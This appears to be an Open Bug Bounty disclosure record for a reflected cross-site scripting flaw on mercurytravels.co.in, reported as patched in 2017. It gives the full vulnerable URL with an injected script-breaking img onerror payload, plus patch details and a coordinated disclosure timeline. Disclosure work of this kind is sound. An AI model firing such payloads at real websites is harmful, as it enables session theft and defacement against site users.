mercurytravels.co.in XSS vulnerability

2016-12-17T00:54:00
ID OBB:198278
Type openbugbounty
Reporter OmniGooch
Modified 2017-04-14T13:37:00

Description

Vulnerable URL:
http://mercurytravels.co.in/searchResult.jsp?fr=%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E&to=%22%3E%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E&dd=16-12-2016&dt=00:00:00,23:59:00&fd=1&rd=18-12-2016&rt=00:00:00,23:59:00&jr=Round%20Trip&nw=&do=exact&sc=Economy&ad=1&ch=0&in=0&sn=0&st=0&ap=&apd=&ns=false&fa=false&lf=false&rf=false&et=false&cr=INR&nb=false&action=FlightSearchBoxComponentActionBean.searchaction
Details:

Description| Value
---|---
Patched:| Yes, on 13.04.2017
Latest check for patch:| 13.04.2017 20:24 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 625916
VIP website status:| No
Check mercurytravels.co.in SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 December, 2016 00:54 GMT
Generic security notifications sent to website owner| 17 December, 2016 00:56 GMT
Vulnerability details disclosed by researcher| 24 December, 2016 01:13 GMT
Vulnerability patched by the website owner| 14 April, 2017 13:37 GMT